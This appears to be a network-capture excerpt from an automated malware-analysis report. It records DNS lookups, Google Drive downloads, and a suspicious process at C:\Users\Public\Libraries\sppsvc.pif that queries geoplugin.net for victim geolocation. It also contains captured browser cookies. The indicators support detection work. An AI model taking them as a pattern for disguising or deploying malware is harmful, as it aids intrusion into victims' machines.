Apr 26, 2024 21:55:59.979015112 CEST | 1.1.1.1 | 192.168.2.5 | 0x7004 | No error (0) | www.google.com | | | 65 | IN (0x0001) | false
Apr 26, 2024 21:56:16.987740993 CEST | 1.1.1.1 | 192.168.2.5 | 0x9c67 | No error (0) | drive.google.com | | 192.178.50.78 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 21:56:18.018366098 CEST | 1.1.1.1 | 192.168.2.5 | 0x3dd3 | No error (0) | drive.usercontent.google.com | | 142.250.217.193 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 21:56:24.329087019 CEST | 1.1.1.1 | 192.168.2.5 | 0xf5be | No error (0) | www.pentegrasystem.com | | 83.137.157.85 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 21:56:26.031994104 CEST | 1.1.1.1 | 192.168.2.5 | 0x9a5b | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 21:57:00.376305103 CEST | 1.1.1.1 | 192.168.2.5 | 0xf171 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 21:57:43.627187014 CEST | 1.1.1.1 | 192.168.2.5 | 0x7e81 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 21:58:30.491169930 CEST | 1.1.1.1 | 192.168.2.5 | 0x118f | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 21:58:54.622006893 CEST | 1.1.1.1 | 192.168.2.5 | 0x3617 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 21:59:45.500214100 CEST | 1.1.1.1 | 192.168.2.5 | 0x2d52 | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                                                                                  • www.google.com
                                                                                                                  • cxcs.microsoft.net
                                                                                                                  • fs.microsoft.com
                                                                                                                  • slscr.update.microsoft.com
                                                                                                                  • drive.usercontent.google.com
                                                                                                                  • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49731 | 178.237.33.50 | 80 | 5228 | C:\Users\Public\Libraries\sppsvc.pif
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 21:56:26.320499897 CEST | 71 | OUT | GET /json.gp HTTP/1.1
Host: geoplugin.net
Cache-Control: no-cache
Apr 26, 2024 21:56:26.571598053 CEST | 1169 | IN | HTTP/1.1 200 OK
date: Fri, 26 Apr 2024 19:56:26 GMT
server: Apache
content-length: 961
content-type: application/json; charset=utf-8
cache-control: public, max-age=300
access-control-allow-origin: *
Data Ascii: { "geoplugin_request":"102.129.152.220", "geoplugin_status":200, "geoplugin_delay":"2ms", "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.", "geoplugin_city":"Miami", "geoplugin_region":"Florida", "geoplugin_regionCode":"FL", "geoplugin_regionName":"Florida", "geoplugin_areaCode":"", "geoplugin_dmaCode":"528", "geoplugin_countryCode":"US", "geoplugin_countryName":"United States", "geoplugin_inEU":0, "geoplugin_euVATrate":false, "geoplugin_continentCode":"NA", "geoplugin_continentName":"North America", "geoplugin_latitude":"25.7689", "geoplugin_longitude":"-80.1946", "geoplugin_locationAccuracyRadius":"20", "geoplugin_timezone":"America\/New_York", "geoplugin_currencyCode":"USD", "geoplugin_currencySymbol":"$", "geoplugin_currencySymbol_UTF8":"$", "geoplugin_currencyConverter":0}


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49710 | 142.250.64.196 | 443 | 7232 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 19:56:00 UTC | 623 | OUT | GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-04-26 19:56:00 UTC | 1703 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 19:56:00 GMT
Pragma: no-cache
Expires: -1
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Strict-Transport-Security: max-age=31536000
Content-Security-Policy: object-src 'none';base-uri 'self';script-src 'nonce-reNsAg0D8DW851RnEAZm8A' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/cdt1
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/cdt1"}]}
Accept-CH: Sec-CH-UA-Platform
Accept-CH: Sec-CH-UA-Platform-Version
Accept-CH: Sec-CH-UA-Full-Version
Accept-CH: Sec-CH-UA-Arch
Accept-CH: Sec-CH-UA-Model
Accept-CH: Sec-CH-UA-Bitness
Accept-CH: Sec-CH-UA-Full-Version-List
Accept-CH: Sec-CH-UA-WoW64
Permissions-Policy: unload=()
Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
Content-Disposition: attachment; filename="f.txt"
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
2024-04-26 19:56:00 UTC | 785 | IN | Data Ascii: 30a)]}'["",["blizzard canceled blizzcon","lord of the rings in theaters 2024","usc graduation ceremony","bucs draft picks","layoffs bristol myers squibb","chicago bears nfl draft picks 2024","stellar blade ign","laguardia airport"],["","","","","","","
2024-04-26 19:56:00 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49708 | 142.250.64.196 | 443 | 7232 | C:\Program Files\Google\Chrome\Application\chrome.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 19:56:00 UTC | 353 | OUT | GET /async/ddljson?async=ntp:2 HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: none
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-04-26 19:56:01 UTC | 1816 | IN | HTTP/1.1 302 Found
Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasync%3Dntp:2&q=EgRmgZjcGNCNsLEGIjAPz7Z-sxmQbwjGDUKQhGNHe3uFLGpixSE6dDkpQnkirN1wFN14uBExRy9KThI8xLgyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
x-hallmonitor-challenge: CgwI0I2wsQYQtML1wAMSBGaBmNw
Content-Type: text/html; charset=UTF-8
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Permissions-Policy: unload=()
Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Date: Fri, 26 Apr 2024 19:56:00 GMT
Server: gws
Content-Length: 427
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: 1P_JAR=2024-04-26-19; expires=Sun, 26-May-2024 19:56:00 GMT; path=/; domain=.google.com; Secure; SameSite=none
Set-Cookie: NID=513=PFvBH79M4E1FdoZGJbp55bxReZbW8CJLMF1_rd6UP8AZnF3eVgVQnjcuIWJt85OcM5__5tCZpEcQWAd070fRLpfv309oZM996bCNskSY7fmGUDe-yL2iiaU08CIMe3nYzAyrLh5cm5jEqUIbe3wRoKRSm4osn3Fv3FZkzk13tF0; expires=Sat, 26-Oct-2024 19:56:00 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-04-26 19:56:01 UTC | 427 | IN | Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/ddljson%3Fasyn


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49709 | 142.250.64.196 | 443 | 7232 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-26 19:56:00 UTC | 526 | OUT | GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-04-26 19:56:01 UTC | 1842 | IN | HTTP/1.1 302 Found
Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGNCNsLEGIjCLPFnVdLGYjtbKIHiASmHBA5O7_cfgfeKSfVG961wW18u4XGlNJfozYzsMBcrzcRwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
x-hallmonitor-challenge: CgsI0Y2wsQYQxJGVFRIEZoGY3A
Content-Type: text/html; charset=UTF-8
Strict-Transport-Security: max-age=31536000
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Permissions-Policy: unload=()
Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Date: Fri, 26 Apr 2024 19:56:01 GMT
Server: gws
Content-Length: 458
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: 1P_JAR=2024-04-26-19; expires=Sun, 26-May-2024 19:56:01 GMT; path=/; domain=.google.com; Secure; SameSite=none
Set-Cookie: NID=513=dIEywckpmnBKntp2GElYlpvANdg1GQg9WS73nz-f5glf4IBfUl3eMpZgnnmShpr9iJ8zBJZaj0vDbSmMSmPVIAAqShn63hvugGyDDhjdWhTmo6-iPW_P22G1Soq0NtFRvrRQtxSQbMFi5XmOtW4IBgt7x104_UZ5eznyt1erQT0; expires=Sat, 26-Oct-2024 19:56:00 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-04-26 19:56:01 UTC | 458 | IN | Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 25 33 46 68
Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fh


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49707 | 142.250.64.196 | 443 | 7232 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-26 19:56:01 UTC | 353 | OUT | GET /async/newtab_promos HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
2024-04-26 19:56:02 UTC | 1761 | IN | HTTP/1.1 302 Found
Location: https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGNGNsLEGIjD9G5xmGH5ri1rv3DQ5wOXVjujAbZEINLE1ZHU1KvNcD8D04QZH5XmP2eIPYJfEfjEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
x-hallmonitor-challenge: CgwI0o2wsQYQlZvWjgESBGaBmNw
Content-Type: text/html; charset=UTF-8
Cross-Origin-Opener-Policy: same-origin-allow-popups; report-to="gws"
Report-To: {"group":"gws","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/gws/none"}]}
Permissions-Policy: unload=()
Origin-Trial: Ap+qNlnLzJDKSmEHjzM5ilaa908GuehlLqGb6ezME5lkhelj20qVzfv06zPmQ3LodoeujZuphAolrnhnPA8w4AIAAABfeyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJQZXJtaXNzaW9uc1BvbGljeVVubG9hZCIsImV4cGlyeSI6MTY4NTY2Mzk5OX0=
Origin-Trial: AvudrjMZqL7335p1KLV2lHo1kxdMeIN0dUI15d0CPz9dovVLCcXk8OAqjho1DX4s6NbHbA/AGobuGvcZv0drGgQAAAB9eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGUuY29tOjQ0MyIsImZlYXR1cmUiOiJCYWNrRm9yd2FyZENhY2hlTm90UmVzdG9yZWRSZWFzb25zIiwiZXhwaXJ5IjoxNjkxNTM5MTk5LCJpc1N1YmRvbWFpbiI6dHJ1ZX0=
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Date: Fri, 26 Apr 2024 19:56:02 GMT
Server: gws
Content-Length: 417
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: 1P_JAR=2024-04-26-19; expires=Sun, 26-May-2024 19:56:02 GMT; path=/; domain=.google.com; Secure; SameSite=none
Set-Cookie: NID=513=e70pJcXp308g-zLvKr2jNfzlf1AWbQuxx93QyO1wlh747mGP0eLOjf7jkr_UXszPZPorC5RVMqJTvYbevYSerH_RLBZfC-j1bqwdBhdxbbGX0EyDoh3X-F2jSKf5iG07WXr7mZ4q9rkgKDP5hh0YZnm2e-fmfcH5KsRunNsMzjo; expires=Sat, 26-Oct-2024 19:56:01 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-04-26 19:56:02 UTC | 417 | IN | Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 54 49 54 4c 45 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 33 30 32 20 4d 6f 76 65 64 3c 2f 48 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 0a 3c 41 20 48 52 45 46 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 6f 72 72 79 2f 69 6e 64 65 78 3f 63 6f 6e 74 69 6e 75 65 3d 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 70 72 6f 6d 6f 73 26
Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/sorry/index?continue=https://www.google.com/async/newtab_promos&


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.5 | 49713 | 142.250.64.196 | 443 | 7232 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-26 19:56:02 UTC | 928 | OUT | GET /sorry/index?continue=https://www.google.com/async/newtab_ogb%3Fhl%3Den-US%26async%3Dfixed:0&hl=en-US&q=EgRmgZjcGNCNsLEGIjCLPFnVdLGYjtbKIHiASmHBA5O7_cfgfeKSfVG961wW18u4XGlNJfozYzsMBcrzcRwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
Host: www.google.com
Connection: keep-alive
X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIkqHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: 1P_JAR=2024-04-26-19; NID=513=dIEywckpmnBKntp2GElYlpvANdg1GQg9WS73nz-f5glf4IBfUl3eMpZgnnmShpr9iJ8zBJZaj0vDbSmMSmPVIAAqShn63hvugGyDDhjdWhTmo6-iPW_P22G1Soq0NtFRvrRQtxSQbMFi5XmOtW4IBgt7x104_UZ5eznyt1erQT0
2024-04-26 19:56:02 UTC | 356 | IN | HTTP/1.1 429 Too Many Requests
Date: Fri, 26 Apr 2024 19:56:02 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3186
X-XSS-Protection: 0
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
2024-04-26 19:56:02 UTC | 899 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 74 69 74 6c 65 3e 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 73 79 6e 63 2f 6e 65 77 74 61 62 5f 6f 67 62 3f 68 6c 3d 65 6e 2d 55 53 26 61 6d 70 3b 61 73 79
Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"><html><head><meta http-equiv="content-type" content="text/html; charset=utf-8"><meta name="viewport" content="initial-scale=1"><title>https://www.google.com/async/newtab_ogb?hl=en-US&amp;asy
2024-04-26 19:56:02 UTC | 1255 | IN | Data Raw: 0a 3c 73 63 72 69 70 74 3e 76 61 72 20 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 42 51 75 62 61 64 68 74 32
Data Ascii: <script>var submitCallback = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="BQubadht2
2024-04-26 19:56:02 UTC | 1032 | IN | Data Raw: 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 65 6d 3b 22 3e 0a 54 68 69 73 20 70 61 67 65 20 61 70 70 65 61 72 73 20 77 68 65 6e 20 47 6f 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74
Data Ascii: ; line-height:1.4em;">This page appears when Google automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly aft


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
5 | 192.168.2.5 | 49714 | 142.250.64.196 | 443 | 7232 | C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp | Bytes transferred | Direction | Data
2024-04-26 19:56:02 UTC | 738 | OUT | GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGNGNsLEGIjD9G5xmGH5ri1rv3DQ5wOXVjujAbZEINLE1ZHU1KvNcD8D04QZH5XmP2eIPYJfEfjEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
Host: www.google.com
Connection: keep-alive
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: no-cors
Sec-Fetch-Dest: empty
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Cookie: 1P_JAR=2024-04-26-19; NID=513=e70pJcXp308g-zLvKr2jNfzlf1AWbQuxx93QyO1wlh747mGP0eLOjf7jkr_UXszPZPorC5RVMqJTvYbevYSerH_RLBZfC-j1bqwdBhdxbbGX0EyDoh3X-F2jSKf5iG07WXr7mZ4q9rkgKDP5hh0YZnm2e-fmfcH5KsRunNsMzjo
2024-04-26 19:56:03 UTC | 356 | IN | HTTP/1.1 429 Too Many Requests
Date: Fri, 26 Apr 2024 19:56:03 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Content-Type: text/html
Server: HTTP server (unknown)
Content-Length: 3114
X-XSS-Protection: 0
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
Connection: close
